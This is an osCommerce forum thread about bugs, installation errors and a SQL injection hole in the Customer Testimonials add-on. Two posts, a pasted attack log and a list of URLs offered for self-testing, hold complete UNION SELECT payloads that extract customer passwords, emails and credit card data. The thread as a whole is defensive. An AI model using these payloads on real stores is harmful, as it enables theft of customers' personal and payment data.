Dennisra Posted February 17, 2009 Share Posted February 17, 2009 I found this fix for the title not showing: Bug Fixes Again shooter-boy 19 Nov 2008 Sorry, forgot to add this one: The infobox doesn't seem to display the title of the testimonial. In catalog/includes/boxes/testimonials.php - Find: 'text' => '<a href="' . tep_href_link(FILENAME_CUSTOMER_TESTIMONIALS, tep_get_all_get_params(array('language', 'currency')) .'&testimonial_id=' . $random_testimonial['testimonials_id']) . '"><b><center>' . $testimonial_titulo . '</center></b><br>' . strip_tags($testimonial) . '... ' . TEXT_READ_MORE . '</a>' Replace with: 'text' => '<a href="' . tep_href_link(FILENAME_CUSTOMER_TESTIMONIALS, tep_get_all_get_params(array('language', 'currency')) .'&testimonial_id=' . $random_testimonial['testimonials_id']) . '"><b><center>' . $random_testimonial['testimonials_title'] . '</center></b><br>' . strip_tags($testimonial) . '... ' . TEXT_READ_MORE . '</a>' Quote Link to comment Share on other sites More sharing options...
Dennisra Posted February 18, 2009 Share Posted February 18, 2009 Apparently this contribution is a major security risk because for mysql injection. See this post: http://www.oscommerce.com/forums/index.php?sho...t&p=1370715 This topic: http://www.oscommerce.com/forums/index.php?sho...=328935&hl= Now what? Quote Link to comment Share on other sites More sharing options...
bkellum Posted February 18, 2009 Share Posted February 18, 2009 Apparently this contribution is a major security risk because for mysql injection. See this post: http://www.oscommerce.com/forums/index.php?sho...t&p=1370715 This topic: http://www.oscommerce.com/forums/index.php?sho...=328935&hl= Now what? Blah Blah Blah Blah Blah Blah Blah You got to love it when someone posts OUTDATED information only to scare the masses. If you would have noticed, this only applied to v3.1 of Customer Testimonials. It has since been addressed in the later versions. If you have an older version, then shame on you. You know what to do. You would have known this if you had taken the time to view the download page and seen that this was addressed over a year ago on Feb 8, 2008. Quote Bill Kellum Sounds Good Productions STS Tutorials & more: STSv4.6, STS Add-ons (STS Power Pack), STS V4 Forum STS Forum FREE TEMPLATE Link to comment Share on other sites More sharing options...
Dennisra Posted February 19, 2009 Share Posted February 19, 2009 Wow! Take a pill or have a beer. That's really a raw nerve you have exposed there pal. Blah Blah Blah Blah Blah Blah Blah You got to love it when someone posts OUTDATED information only to scare the masses. If you would have noticed, this only applied to v3.1 of Customer Testimonials. It has since been addressed in the later versions. If you have an older version, then shame on you. You know what to do. You would have known this if you had taken the time to view the download page and seen that this was addressed over a year ago on Feb 8, 2008. Quote Link to comment Share on other sites More sharing options...
bkellum Posted February 19, 2009 Share Posted February 19, 2009 Wow! Take a pill or have a beer. That's really a raw nerve you have exposed there pal. :lol: The raw nerve is when someone who has been a member for such a long period of time such as yourself should know better than to raise such an issue before searching the forums and download area. However, you are not the only one that does this as is evident from the link that you posted. :huh: Hope you got your situation worked out and everything is working fine for you now. Quote Bill Kellum Sounds Good Productions STS Tutorials & more: STSv4.6, STS Add-ons (STS Power Pack), STS V4 Forum STS Forum FREE TEMPLATE Link to comment Share on other sites More sharing options...
spooks Posted February 19, 2009 Share Posted February 19, 2009 Hi Bill, could you clear this up for me, I`ve looked through customer_testimonials_write.php and the only sanitising I see is with tep_db_prepare_input this is not sufficient to prevent an injection attack as it fails to remove quotes, perhaps I missed something? :huh: Quote Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
Dennisra Posted February 19, 2009 Share Posted February 19, 2009 Below is one of many exploit attempts launched on customer_testimonials.php recorded by mod-security log from my server. Please note that mod-security has so far stopped the hackers but there very likely could be an exploit still available in the Testimonial contribution. Keep in mind I have only had this contribution activated for less than 24 hours. This attack ipn resolves to bellsouth.net ==b4eb491c============================== Request: www.mywesite.com 70.151.0.153 - - [19/Feb/2009:08:47:13 -0600] "GET /customer_testimonials.php?testimoni al_id=99999+union+select+1,2,concat(customers_name,0x3a,customers_email_address, 0x3a,billing_name,0x3a,billing_ company,0x3a,billing_street_address,0x3a,billing_suburb,0x3a,billing_city,0x3a,b illing_postcode,0x3a,billing_st ate,0x3a,billing_country,0x3a,payment_method,0x3a,cc_type,0x3a,cc_owner,0x3a,cc_ number,0x3a,cc_expires),4,5,6,7 ,8,9+from+orders HTTP/1.1" 404 1736 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/200 81217 Firefox/2.0.0.20" SZ1w8Njzn@0AAWTyfYw "-" Handler: cgi-script ---------------------------------------- GET /customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_name,0x3a,customers_email _address,0x3a,billing_name,0x3a,billing_company,0x3a,billing_street_address,0x3a ,billing_suburb,0x3a,billing_ci ty,0x3a,billing_postcode,0x3a,billing_state,0x3a,billing_country,0x3a,payment_me thod,0x3a,cc_type,0x3a,cc_owner ,0x3a,cc_number,0x3a,cc_expires),4,5,6,7,8,9+from+orders HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Connection: keep-alive Host: www.mywebsite.com Keep-Alive: 300 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 mod_security-action: 404 mod_security-message: Access denied with code 404. Pattern match "select.+from" at REQUEST_URI [severity "EMERG ENCY"] HTTP/1.1 404 Condition Intercepted Set-Cookie: Error404=1 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --b4eb491c-- Quote Link to comment Share on other sites More sharing options...
bkellum Posted February 20, 2009 Share Posted February 20, 2009 Hi Bill, could you clear this up for me, I`ve looked through customer_testimonials_write.php and the only sanitising I see is with tep_db_prepare_input this is not sufficient to prevent an injection attack as it fails to remove quotes, perhaps I missed something? :huh: Hello Sam, The customer_testimonials.php file is required and includes the sanitize code for each input. I have tested the SQL injections on my test site and have found it not open to attack. Since this has been brought up again, I am now looking over each line of code to make sure it is not open to security issues. ******************** I would like to apologize to Dennisra as I probably was a little harsh regarding his alert. I didn't think there would actually be shop owners out there using the older versions of this mod. That is very dangerous and he was correct in making them aware of the possible SQL injection vulnerability. Quote Bill Kellum Sounds Good Productions STS Tutorials & more: STSv4.6, STS Add-ons (STS Power Pack), STS V4 Forum STS Forum FREE TEMPLATE Link to comment Share on other sites More sharing options...
Dennisra Posted February 20, 2009 Share Posted February 20, 2009 Apology accepted and not a problem. I am using version 3.62. I have temporarily removed the contribution until you finish a review. Below is a small portion of my server error log from today. Word sure gets around that customer_testimonials.php has been found on a server and then the break in attempts begin. This has to be done by machine as there is an attempt nearly every second. This ip 38.98.120.73 is PSINet, Inc in Washington DC so these aren't Turkey or Asia originating attacks. /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:24 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:25 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:26 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:27 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:28 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:29 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:30 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:31 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:32 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:33 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:34 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:35 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:40 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:41 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:42 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:43 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:45 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:47 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:47 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:48 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:49 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:50 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:51 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:52 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:53 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:55 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:00 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:00 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:01 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:02 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:03 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:05 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:06 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:07 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:11 2009] [error] [client 72.30.142.221] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:14:23 2009] [error] [client 72.30.142.221] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:02 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:03 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:04 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:05 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:06 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:07 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:08 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:09 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:10 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:11 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:13 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:14 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:15 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:16 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:21 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:22 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:23 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:24 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:25 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:26 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:27 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:28 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:29 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:30 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:31 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:35 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:36 2009] [error] [client 38.98.120.73] File does not exist: /usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:36 2009] [error] [client 38.98.120.73] File does not exist: Quote Link to comment Share on other sites More sharing options...
mr_absinthe Posted February 20, 2009 Share Posted February 20, 2009 (edited) Hello, you can test your site using these exploits: http://site.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/* http://site.com/customer_testimonials.php?testimonial_id=null%20union%20all%20select%201,2,3,4,5,concat(customers_email_address,0x3a,customers_telephone,0x3a,cc_expires,0x3a,cc_num ber,0x3a,cc_owner,0x3a,payment_method,0x3a,cc_type,0x3a,billing_country,0x3a,bill ing_state,0x3a,billing_postcode,0x3a,billing_city,0x3a,billing_street_address,0x3 a,billing_company,0x3a,billing_name),7,8%20from%20orders-- If you see list of your customers instead of testimonials, you're at a potential risk. Correct me if I'm wrong... installing Security Pro will stop these exploits and protect your site from further attacks. You can further enhance it with this security fix and automatic redirect. As I said, I might be wrong but using those exploits on my site, I see no customer's details. Edited February 20, 2009 by mr_absinthe Quote Absinthe Original Liquor Store Link to comment Share on other sites More sharing options...
bkellum Posted February 20, 2009 Share Posted February 20, 2009 Hello, you can test your site using these exploits: http://site.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/* http://site.com/customer_testimonials.php?testimonial_id=null%20union%20all%20select%201,2,3,4,5,concat(customers_email_address,0x3a,customers_telephone,0x3a,cc_expires,0x3a,cc_num ber,0x3a,cc_owner,0x3a,payment_method,0x3a,cc_type,0x3a,billing_country,0x3a,bil l ing_state,0x3a,billing_postcode,0x3a,billing_city,0x3a,billing_street_address,0x 3 a,billing_company,0x3a,billing_name),7,8%20from%20orders-- If you see list of your customers instead of testimonials, you're at a potential risk. Correct me if I'm wrong... installing Security Pro will stop these exploits and protect your site from further attacks. You can further enhance it with this security fix and automatic redirect. As I said, I might be wrong but using those exploits on my site, I see no customer's details. Customer Testimonials v4.0 IS NOT vulnerable to those exploits above, even without the extra security add-ons installed. My test site is a stock osC RC2a with CTv4.0 only. I also tested using other known exploits with the same results (passed). The only addition to CTv4.0 that is recommended is mentioned in the installation text of the download and that would be to install the image validation for extra security but this is not installed on my test site. Quote Bill Kellum Sounds Good Productions STS Tutorials & more: STSv4.6, STS Add-ons (STS Power Pack), STS V4 Forum STS Forum FREE TEMPLATE Link to comment Share on other sites More sharing options...
mr_absinthe Posted February 20, 2009 Share Posted February 20, 2009 I'm NOT saying that your version IS vulnerable, I just wanted to help those people that have installed previous versions since no help was posted, yet. There might be various reasons for not updating completely to the latest version of testimonials (or any other contribution) and deleting customer_testimonials.php is not an option for many store owners. It would be nice to provide a code that could fix and secure any previous versions - we've seen similar ways to fix quite a few other contributions. If I was familiar with this contribution, I would have posted that fix/code. Quote Absinthe Original Liquor Store Link to comment Share on other sites More sharing options...
jal2007 Posted February 20, 2009 Share Posted February 20, 2009 I found the errors solutions, please don't read the topic above !! ;) Fatal error: Call to undefined function tep_set_TESTIMONIALS_status() in /home/faimports/www/loja/admin/testimonials_manager.php on line 14 Hi how you fix this since i get the same problem as yours? thanks heaps regards, jal Quote Link to comment Share on other sites More sharing options...
bkellum Posted February 20, 2009 Share Posted February 20, 2009 I'm NOT saying that your version IS vulnerable, I just wanted to help those people that have installed previous versions since no help was posted, yet. There might be various reasons for not updating completely to the latest version of testimonials (or any other contribution) and deleting customer_testimonials.php is not an option for many store owners. It would be nice to provide a code that could fix and secure any previous versions - we've seen similar ways to fix quite a few other contributions. If I was familiar with this contribution, I would have posted that fix/code. Yeah, Alex, I totally understood where you were coming from regarding the testing of the SQL injections. By the way, the fix has been posted for quite sometime in the Customer Testimonials download page for those that do not wish to upgrade. Upgrading is quite easy though since most of the updates are to the native customer testimonial files anyway (New Files folder). Quote Bill Kellum Sounds Good Productions STS Tutorials & more: STSv4.6, STS Add-ons (STS Power Pack), STS V4 Forum STS Forum FREE TEMPLATE Link to comment Share on other sites More sharing options...
lhps Posted March 6, 2009 Share Posted March 6, 2009 My problem is. Fatal error: Class 'upload' not found in /home/web/public_html/customer_testimonials_write.php on line 28 is line if(!is_dir(DIR_WS_IMAGES . 'testimonials'))mkdir(DIR_WS_IMAGES . 'testimonials', '777'); $testimonial_image = new upload('testimonial_image'); $testimonial_image->set_destination(DIR_WS_IMAGES . 'testimonials/'); if ($testimonial_image->parse() && $testimonial_image->save()) { $testimonial_image_name = $testimonial_image->filename; } The archive upload.php is in the folder. Than'ks for help. Quote Link to comment Share on other sites More sharing options...
bkellum Posted March 6, 2009 Share Posted March 6, 2009 My problem is. Fatal error: Class 'upload' not found in /home/web/public_html/customer_testimonials_write.php on line 28 is line The archive upload.php is in the folder. Than'ks for help. Hello Lucas, Check your files using a file comparison tool such as Beyond Compare or WinMerge against the files from the contribution. You may also be missing the testimonials folder in your image directory. Note: This contribution uploads an additional upload.php file that is seaparate from the original stock upload.php file that is in the admin side. The new upload.php file is in the catalog side to allow customers to upload an image from the frontend. Quote Bill Kellum Sounds Good Productions STS Tutorials & more: STSv4.6, STS Add-ons (STS Power Pack), STS V4 Forum STS Forum FREE TEMPLATE Link to comment Share on other sites More sharing options...
lhps Posted March 6, 2009 Share Posted March 6, 2009 Hello Lucas, Check your files using a file comparison tool such as Beyond Compare or WinMerge against the files from the contribution. You may also be missing the testimonials folder in your image directory. Note: This contribution uploads an additional upload.php file that is seaparate from the original stock upload.php file that is in the admin side. The new upload.php file is in the catalog side to allow customers to upload an image from the frontend. Hi Thank's for respot, The archive upload.php in this folder classes in direcotry catalog/includes/classes/ . The folder image/testimonials is creat . I do not understand this information "Check your files using a file comparison tool such as Beyond Compare or WinMerge against the files from the contribution." I check what(wich) files?? upload.php ?? Quote Link to comment Share on other sites More sharing options...
bkellum Posted March 6, 2009 Share Posted March 6, 2009 Hi Thank's for respot, The archive upload.php in this folder classes in direcotry catalog/includes/classes/ . The folder image/testimonials is creat . I do not understand this information "Check your files using a file comparison tool such as Beyond Compare or WinMerge against the files from the contribution." I check what(wich) files?? upload.php ?? To find where you made your mistake in the installation a lot faster and easier would be to use a file comparison utility. Beyond Compare allows you to compare all of the files and folders from one directory (such as your shop) with all of the files and folders of another directory (such as the files included in the contribution). What this will do is show you where you may have uploaded a file/folder to the wrong location or if you did a manual installation, it would show you where you may have misplaced some code. Once you found your mistake, you could simply "merge" in the changes to make the files in sync with each other. Do a search for Beyond Compare on Google and you will get more details on this very useful tool. Quote Bill Kellum Sounds Good Productions STS Tutorials & more: STSv4.6, STS Add-ons (STS Power Pack), STS V4 Forum STS Forum FREE TEMPLATE Link to comment Share on other sites More sharing options...
gordo942 Posted March 20, 2009 Share Posted March 20, 2009 (edited) Installed script and it functions exactly as it should...LOVE IT!! Thanks!....only problem is with page formatting. Having problems with <table> codings in customer_testimonials_write.php. I have STS installed and half a dozen other mods...this is the only one that throws the right column out of whack. Just spent the last four hours searching for the missing...or extra <table> (or more likely </table>)...thought I found it, but still doesn't format correctly. I got the submit form formatted, but now after a user submits a testimonial the success page is messed up. Anyone having similar issues? Suggestions? Edited March 20, 2009 by gordo942 Quote Link to comment Share on other sites More sharing options...
bkellum Posted March 20, 2009 Share Posted March 20, 2009 Installed script and it functions exactly as it should...LOVE IT!! Thanks!....only problem is with page formatting. Having problems with <table> codings in customer_testimonials_write.php. I have STS installed and half a dozen other mods...this is the only one that throws the right column out of whack. Just spent the last four hours searching for the missing...or extra <table> (or more likely </table>)...thought I found it, but still doesn't format correctly. I got the submit form formatted, but now after a user submits a testimonial the success page is messed up. Anyone having similar issues? Suggestions? I'll take a look and see if I can duplicate your issue. You may simply need to create a template for this script and set the table widths there. Quote Bill Kellum Sounds Good Productions STS Tutorials & more: STSv4.6, STS Add-ons (STS Power Pack), STS V4 Forum STS Forum FREE TEMPLATE Link to comment Share on other sites More sharing options...
gordo942 Posted March 21, 2009 Share Posted March 21, 2009 I'll take a look and see if I can duplicate your issue. You may simply need to create a template for this script and set the table widths there. well...I got a fix...it's not pretty but works. Added another </td></tr></table> at line 266 before <?php } ?> to fix formatting on the the form. And commented out </td></tr> and the line after <!-- body_text_eof //--> to fix formatting for the success screen. Quote Link to comment Share on other sites More sharing options...
gordo942 Posted March 23, 2009 Share Posted March 23, 2009 Another question... I have my infoboxes formatted by STS and on the Testimonial page, each testimonial is listed in a separate infobox...just makes the page look a little busy. Any way to have them listed in just a simple table with a border and not an infobox? Quote Link to comment Share on other sites More sharing options...
shoguntech Posted March 30, 2009 Share Posted March 30, 2009 First, Thank you for this contirb. This worked great for me out of the box. Of course I was hoping to get some help now that I seem to have messed it up with some other contrib. (no clue which one) My customers_testimonials.php page now shows this error at the bottom... Fatal error: Cannot redeclare preorder() (previously declared in /....html/includes/boxes/categories.php:17) in /..../html/includes/boxes/categories.php on line 48 Since all my other pages seem to be working I thought someone might have a clue where to look? My categories lines 33-53 look like this.. // Traverse category tree- this is for older snapshots pre-November 2002 /* foreach ($foo as $key => $value) { if ($foo[$key]['parent'] == $cid) { // print "$key, $level, $cid, $cpath<br>"; preorder($key, $level+1, $foo, ($level != 0 ? $cpath . $cid . '_' : '')) ; } */ // Function used for post November 2002 snapshots function tep_show_category($counter) { global $foo, $categories_string, $id; for ($a=0; $a<$foo[$counter]['level']; $a++) { $categories_string .= " "; } } } ////////// // Display box heading ////////// I have re-installed customer_testimonials and compared the exiting files with no luck so far. p.s. keep up the awsome work. Quote Link to comment Share on other sites More sharing options...
shoguntech Posted March 30, 2009 Share Posted March 30, 2009 First, Thank you for this contirb. This worked great for me out of the box. Of course I was hoping to get some help now that I seem to have messed it up with some other contrib. (no clue which one) My customers_testimonials.php page now shows this error at the bottom... Fatal error: Cannot redeclare preorder() (previously declared in /....html/includes/boxes/categories.php:17) in /..../html/includes/boxes/categories.php on line 48 Since all my other pages seem to be working I thought someone might have a clue where to look? My categories lines 33-53 look like this.. // Traverse category tree- this is for older snapshots pre-November 2002 /* foreach ($foo as $key => $value) { if ($foo[$key]['parent'] == $cid) { // print "$key, $level, $cid, $cpath<br>"; preorder($key, $level+1, $foo, ($level != 0 ? $cpath . $cid . '_' : '')) ; } */ // Function used for post November 2002 snapshots function tep_show_category($counter) { global $foo, $categories_string, $id; for ($a=0; $a<$foo[$counter]['level']; $a++) { $categories_string .= " "; } } } ////////// // Display box heading ////////// I have re-installed customer_testimonials and compared the exiting files with no luck so far. Also tried changining the code to bypass like this with no luck // Traverse category tree- this is for older snapshots pre-November 2002 /* foreach ($foo as $key => $value) { if ($foo[$key]['parent'] == $cid) { // print "$key, $level, $cid, $cpath<br>"; preorder($key, $level+1, $foo, ($level != 0 ? $cpath . $cid . '_' : '')) ; } // Function used for post November 2002 snapshots function tep_show_category($counter) { global $foo, $categories_string, $id; for ($a=0; $a<$foo[$counter]['level']; $a++) { $categories_string .= " "; } */ } p.s. keep up the awsome work. Quote Link to comment Share on other sites More sharing options...
gordo942 Posted April 14, 2009 Share Posted April 14, 2009 (edited) Another question... I have my infoboxes formatted by STS and on the Testimonial page, each testimonial is listed in a separate infobox...just makes the page look a little busy. Any way to have them listed in just a simple table with a border and not an infobox? :blink: Any thoughts? Anyone? :blink: Edited April 14, 2009 by gordo942 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.